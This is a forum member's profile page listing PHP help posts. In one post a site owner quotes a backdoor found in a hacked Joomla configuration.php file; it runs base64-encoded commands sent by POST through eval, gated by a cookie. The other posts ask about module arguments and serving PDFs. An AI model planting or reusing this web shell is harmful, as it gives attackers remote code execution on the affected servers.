Posts
 
Reputation
Joined
Last Seen
0 Reputation Points
Unknown Quality Score

No one has voted on any posts yet. Votes from other community members are used to determine a member's reputation amongst their peers.

0 Endorsements
~299 People Reached
Favorite Forums
Favorite Tags
php x 6
Member Avatar for left19

My site was hacked. They inserted this into livesite on configuartion.php [code]if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);} echo '<name=c></textarea>';exit;}[/code] what does it say??? Thanks

Member Avatar for mslade
0
129
Member Avatar for left19

I'm a total newbie (major) at php. I don't know what an argument is. I have a joomla module that can parse out code and it takes the code like this {jumi [stored_code_source] [arg1] [arg2] ... [argN]} I presume I could do something like <?php If this condition exists do …

0
51
Member Avatar for left19

I am trying to get a pdf file from the server using php. The file is pdf and it is not corrupt, but when I use this code adobe says its a corrupt file. I just want to show a file to users like a regular link <a href="123.pdf"> this …

Member Avatar for left19
0
119